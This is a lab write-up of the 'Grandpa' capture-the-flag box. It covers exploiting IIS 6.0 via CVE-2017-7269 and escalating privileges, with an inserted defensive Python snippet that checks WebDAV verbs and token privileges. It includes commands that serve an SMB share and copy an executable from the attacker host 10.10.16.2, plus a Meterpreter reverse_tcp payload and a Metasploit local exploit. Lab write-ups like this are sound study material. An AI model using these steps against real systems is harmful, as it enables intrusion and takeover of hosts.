# Grandpa

I rated this box medium, because I did it with Metasploit and it would have taken more effort and different steps to do it without, which was not easy for me at the time.

## Initial Access

nmap:

```
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
OS: Windows older than Server 2008 or Windows 7
```

Searching for the IIS version I find CVE-2017-7269 everywhere. There is a PoC:

[g0rx/iis6-exploit-2017-CVE-2017-7269 (iis6 reverse shell)](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell)

This worked and I have a shell as network service.


## Privilege Escalation

`C:\>whoami /priv`

```
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
```

With SeImpersonatePrivilege enabled we should be able to escalate privileges using PrintSpoofer.

I transferred the PrintSpoofer executable to the host with smbserver.py. For this to work I needed a writeable directory, which I found at C:\wmpub\wmiislog.
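The two findings this writeup turns on, the WebDAV verbs advertised by IIS 6 (the surface patched for CVE-2017-7269) and the impersonation-class privilege on the service token, can be checked programmatically. This is an added example, not the author's code or any tool from the box; the inputs are constructed copies of the nmap and `whoami /priv` output shown above, and the verb and privilege lists are my own.

```python
# Added example: inputs are constructed copies of the scan and `whoami /priv` output on the page.
ALLOWED_METHODS_LINE = (
    "Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK"
)

WHOAMI_PRIV = """PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Verbs that only exist when WebDAV is enabled on the site; on IIS 6 that is the
# component patched for CVE-2017-7269, so disable WebDAV wherever it is not needed.
WEBDAV_VERBS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}

# Privileges that let a compromised service account act as a higher-privileged client.
# Holding them is what matters: "Disabled" in whoami only means not currently enabled
# in the token, and a process can enable a privilege it holds.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def webdav_verbs(allowed_line: str) -> set:
    """Return the WebDAV verbs advertised in an nmap/OPTIONS 'Allowed Methods' line."""
    _, _, verbs = allowed_line.partition(":")
    return {v.strip().upper() for v in verbs.split(",")} & WEBDAV_VERBS


def parse_privs(output: str) -> dict:
    """Map privilege name -> state ('Enabled'/'Disabled') from `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        parts = line.split()
        # Data rows start with the SeXxxPrivilege name and end with the state column.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def held_token_privs(privs: dict) -> dict:
    """Impersonation-class privileges the token holds, with their current state."""
    return {p: s for p, s in privs.items() if p in TOKEN_PRIVS}
```

Run against a real `whoami /priv` capture from a service account to see which of these privileges it holds; any hit means the account should be reviewed for least privilege, not just the one currently marked Enabled.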

`sudo smbserver.py -smb2support soos .`

`copy \\10.10.16.2\soos\PrintSpoofer32.exe .\PrintSpoofer32.exe`

This did not work and made the shell inaccessible.

I transferred a `windows/meterpreter/reverse_tcp` payload to the host and ran it:

`cmd shell.exe`

I then used this exploit to get SYSTEM: `windows/local/ms14_058_track_popup_menu`

I know that this is the easy way and you should be able to do this without Metasploit.

